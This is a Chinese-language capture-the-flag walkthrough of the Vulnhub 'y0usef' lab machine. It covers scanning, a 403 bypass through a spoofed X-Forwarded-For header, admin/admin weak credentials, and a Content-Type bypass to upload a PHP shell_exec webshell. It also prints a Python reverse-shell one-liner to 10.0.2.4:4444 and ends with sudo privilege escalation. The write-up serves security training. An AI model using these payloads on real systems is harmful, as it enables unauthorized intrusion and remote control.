Vulnhub靶机-y0usef
2023-5-24 00:29:3 Author: 白帽子(查看原文) 阅读量:16 收藏

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

y0usef

[靶机地址]: 

https://download.vulnhub.com/y0usef/y0usef.ova

内容简介

难度:低
目标:取得 root 权限 + 2 Flag
主要运用攻击手段:

  • 主机发现 

  • 端口扫描 

  • WEB信息收集 

  • 指纹探测 

  • 弱口令 

  • 403 Bypass 

  • 文件上传及绕过 

  • base64编码 

  • 本地提权

环境准备

下载好文件,导入VM Virtualbox虚拟机。
攻击机kali:10.0.2.4
靶机:10.0.2.8

攻击开始

1.主机发现

arp-scan -l

2.端口扫描

nmap -p- 10.0.2.8

3.服务发现

nmap -p22,80 -sV 10.0.2.8

4.收集信息

80端口开启着web服务,我们直接访问。

通过对页面进行信息收集,并没有发现有用的信息。
查看目标靶机网站架构组成。

whatweb http://10.0.2.8

Apache后端web服务,Bootstrap前端框架,系统是Ubuntu,使用的语言是PHP-5.5.9。
扫描目标靶机的目录。

出现很多403响应码表示拒绝访问,经过测试/index.php/index.php/login/仍是主页,但是有一个路径/adminstration,尝试访问。

依旧是拒绝访问,说明这个地址是存在的,但是我们的权限很低没有办法访问,这个说明目标靶机的管理员做过权限控制,但是很多时候管理员做的权限控制很存在安全隐患,我们尝试是否可以绕过403授权限制。

5.403 Bypass

burp suite抓包。

修改数据包头部,添加X-Fprwarded-For让目标靶机认为这个请求是来自他自己的请求

成功访问。

6.测试漏洞

我们尝试登录,最终经过测试目标靶机存在弱口令adminadmin,继续burp suite抓包,每一个包都加上X-Forwarded-For: 127.0.0.1,然后forward

成功进入后台,在后台中我们发现了Upload file,依旧利用burp suite进行访问,进入Upload file页面。

7.文件上传

上传一个shell

<?php $var=shell_exec($_GET['axpmyw']); echo $var ?>

我们直接上传php的shell

发现目标靶机有限制,不允许上传,尝试绕过限制,经过测试当修改Content-Type时可以上传成功。

利用BurpSuite访问。

传入参数。

?axpmyw=id

8.反弹shell

shell成功上传,并且可以利用shell执行命令,查看一下目标靶机有没有python环境。

?axpmyw=which python

有python环境,我们可以利用python反弹shell,脚本如下:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.2.4",4444));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);'

开启监听。

反弹shell

成功获取一个shell

升级一下目标靶机的shell

python -c "import pty; pty.spawn('/bin/bash')"

/home目录下找到一个flag

c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

这一段明显是一串base64编码,尝试解码。

ssh : 
user : yousef 
pass : yousef123

提示ssh的用户名和密码,ssh登录。

通过查看id发现youser账号可以执行sudo命令,而且可以运行这个靶机上的所有程序。

9.权限提升

切换root权限。

/root目录下发现了第二个flag

WW91J3ZlIGdvdCB0aGUgcm9vdCBDb25ncmF0dWxhdGlvbnMgYW55IGZlZWRiYWNrIGNvbnRlbnQgbWUgdHdpdHRlciBAeTB1c2VmXzEx

很明显也是base64编码,进行解码。

You've got the root Congratulations any feedback content me twitter @y0usef_11

这是靶机作者的一段留言。

安恒信息

杭州亚运会网络安全服务官方合作伙伴

成都大运会网络信息安全类官方赞助商

武汉军运会、北京一带一路峰会

青岛上合峰会、上海进博会

厦门金砖峰会、G20杭州峰会

支撑单位北京奥运会等近百场国家级

重大活动网络安保支撑单位

END

长按识别二维码关注我们


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246719&idx=1&sn=3d1f0fd3e4facbf574bc47ec9aa35fc9&chksm=82ea5596b59ddc805363ca85711794a0a5b23a841bd4eefc50176f6c9e4985afec3212d0c287#rd
如有侵权请联系:admin#unsafe.sh